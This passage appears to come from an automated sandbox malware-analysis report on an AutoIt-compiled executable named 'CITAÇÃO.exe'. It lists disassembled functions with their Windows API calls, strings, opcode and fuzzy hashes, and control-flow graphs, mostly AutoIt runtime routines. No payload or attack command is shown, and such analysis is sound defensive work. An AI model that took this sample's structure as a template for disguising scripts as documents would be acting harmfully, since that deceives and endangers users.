                                                      • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                      • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                      • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                      • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                      Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                      • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                      • TranslateMessage.USER32(?), ref: 00409556
                                                      • DispatchMessageW.USER32(?), ref: 00409561
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Message$Peek$DispatchSleepTranslate
                                                      • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                      • API String ID: 1762048999-758534266
                                                      • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                      • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                      • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                      • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                                      Function 00401F20 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 214COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,00000104,?), ref: 00401F4C
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • __wcsicoll.LIBCMT ref: 00402007
                                                      • __wcsicoll.LIBCMT ref: 0040201D
                                                      • __wcsicoll.LIBCMT ref: 00402033
                                                        • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                      • __wcsicoll.LIBCMT ref: 00402049
                                                      • _wcscpy.LIBCMT ref: 0040207C
                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe,00000104), ref: 00428B5B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe$CMDLINE$CMDLINERAW
                                                      • API String ID: 3948761352-1924437800
                                                      • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                      • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                      • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                      • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                                      Function 00452719 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 147COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock$_fseek_wcscpy
                                                      • String ID: D)E$D)E$FILE
                                                      • API String ID: 3888824918-361185794
                                                      • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                      • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                      • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                      • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                                      Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                      • __wsplitpath.LIBCMT ref: 0040E41C
                                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                      • _wcsncat.LIBCMT ref: 0040E433
                                                      • __wmakepath.LIBCMT ref: 0040E44F
                                                        • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                      • _wcscpy.LIBCMT ref: 0040E487
                                                        • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                      • _wcscat.LIBCMT ref: 00427541
                                                      • _wcslen.LIBCMT ref: 00427551
                                                      • _wcslen.LIBCMT ref: 00427562
                                                      • _wcscat.LIBCMT ref: 0042757C
                                                      • _wcsncpy.LIBCMT ref: 004275BC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                      • String ID: Include$\
                                                      • API String ID: 3173733714-3429789819
                                                      • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                      • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                      • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                      • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                                      Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • _fseek.LIBCMT ref: 0045292B
                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                      • __fread_nolock.LIBCMT ref: 00452961
                                                      • __fread_nolock.LIBCMT ref: 00452971
                                                      • __fread_nolock.LIBCMT ref: 0045298A
                                                      • __fread_nolock.LIBCMT ref: 004529A5
                                                      • _fseek.LIBCMT ref: 004529BF
                                                      • _malloc.LIBCMT ref: 004529CA
                                                      • _malloc.LIBCMT ref: 004529D6
                                                      • __fread_nolock.LIBCMT ref: 004529E7
                                                      • _free.LIBCMT ref: 00452A17
                                                      • _free.LIBCMT ref: 00452A20
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                      • String ID:
                                                      • API String ID: 1255752989-0
                                                      • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                      • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                      • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                      • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                                      Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                      • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                      • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                      • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                      • ImageList_ReplaceIcon.COMCTL32(00AB1F10,000000FF,00000000), ref: 00410552
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-1005189915
                                                      • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                      • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                      • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                      • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                                      Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                      • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                      • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                      • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                      • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                      • RegisterClassExW.USER32(?), ref: 0041045D
                                                        • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                        • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                        • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                        • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                        • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                        • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                        • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00AB1F10,000000FF,00000000), ref: 00410552
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                      • String ID: #$0$AutoIt v3
                                                      • API String ID: 423443420-4155596026
                                                      • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                      • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                      • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                      • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                      Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _malloc
                                                      • String ID: Default
                                                      • API String ID: 1579825452-753088835
                                                      • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                      • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                      • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                      • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                                      Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2036 40f5c0-40f5cf call 422240 2039 40f5d0-40f5e8 2036->2039 2039->2039 2040 40f5ea-40f613 call 413650 call 410e60 2039->2040 2045 40f614-40f633 call 414d04 2040->2045 2048 40f691 2045->2048 2049 40f635-40f63c 2045->2049 2050 40f696-40f69c 2048->2050 2051 40f660-40f674 call 4150d1 2049->2051 2052 40f63e 2049->2052 2056 40f679-40f67c 2051->2056 2054 40f640 2052->2054 2055 40f642-40f650 2054->2055 2057 40f652-40f655 2055->2057 2058 40f67e-40f68c 2055->2058 2056->2045 2059 40f65b-40f65e 2057->2059 2060 425d1e-425d3e call 4150d1 call 414d04 2057->2060 2061 40f68e-40f68f 2058->2061 2062 40f69f-40f6ad 2058->2062 2059->2051 2059->2054 2073 425d43-425d5f call 414d30 2060->2073 2061->2057 2064 40f6b4-40f6c2 2062->2064 2065 40f6af-40f6b2 2062->2065 2067 425d16 2064->2067 2068 40f6c8-40f6d6 2064->2068 2065->2057 2067->2060 2070 425d05-425d0b 2068->2070 2071 40f6dc-40f6df 2068->2071 2070->2055 2072 425d11 2070->2072 2071->2057 2072->2067 2073->2050
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock_fseek_memmove_strcat
                                                      • String ID: AU3!$EA06
                                                      • API String ID: 1268643489-2658333250
                                                      • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                      • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                      • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                      • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                                      Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2076 401100-401111 2077 401113-401119 2076->2077 2078 401179-401180 2076->2078 2080 401144-40114a 2077->2080 2081 40111b-40111e 2077->2081 2078->2077 2079 401182 2078->2079 2082 40112c-401141 DefWindowProcW 2079->2082 2084 401184-40118e call 401250 2080->2084 2085 40114c-40114f 2080->2085 2081->2080 2083 401120-401126 2081->2083 2083->2082 2087 42b038-42b03f 2083->2087 2091 401193-40119a 2084->2091 2088 401151-401157 2085->2088 2089 40119d 2085->2089 2087->2082 2090 42b045-42b059 call 401000 call 40e0c0 2087->2090 2094 401219-40121f 2088->2094 2095 40115d 2088->2095 2092 4011a3-4011a9 2089->2092 2093 42afb4-42afc5 call 40f190 2089->2093 2090->2082 2092->2083 2099 4011af 2092->2099 2093->2091 2094->2083 2096 401225-42b06d call 468b0e 2094->2096 2100 401163-401166 2095->2100 2101 42b01d-42b024 2095->2101 2096->2091 2099->2083 2107 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2099->2107 2108 4011db-401202 SetTimer RegisterWindowMessageW 2099->2108 2102 42afe9-42b018 call 40f190 call 401a50 2100->2102 2103 40116c-401172 2100->2103 2101->2082 2109 42b02a-42b033 call 4370f4 2101->2109 2102->2082 2103->2083 2110 401174-42afde call 45fd57 2103->2110 2108->2091 2115 401204-401216 CreatePopupMenu 2108->2115 2109->2082 2110->2082 2127 42afe4 2110->2127 2127->2091
                                                      APIs
                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                      • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                      • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                      • CreatePopupMenu.USER32 ref: 00401204
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                      • String ID: TaskbarCreated
                                                      • API String ID: 129472671-2362178303
                                                      • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                      • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                      • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                      • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                                      Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2128 4115d7-4115df 2129 4115ee-4115f9 call 4135bb 2128->2129 2132 4115e1-4115ec call 411988 2129->2132 2133 4115fb-4115fc 2129->2133 2132->2129 2136 4115fd-41160e 2132->2136 2137 411610-41163b call 417fc0 call 41130a 2136->2137 2138 41163c-411656 call 4180af call 418105 2136->2138 2137->2138
                                                      APIs
                                                      • _malloc.LIBCMT ref: 004115F1
                                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                      • std::exception::exception.LIBCMT ref: 00411626
                                                      • std::exception::exception.LIBCMT ref: 00411640
                                                      • __CxxThrowException@8.LIBCMT ref: 00411651
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
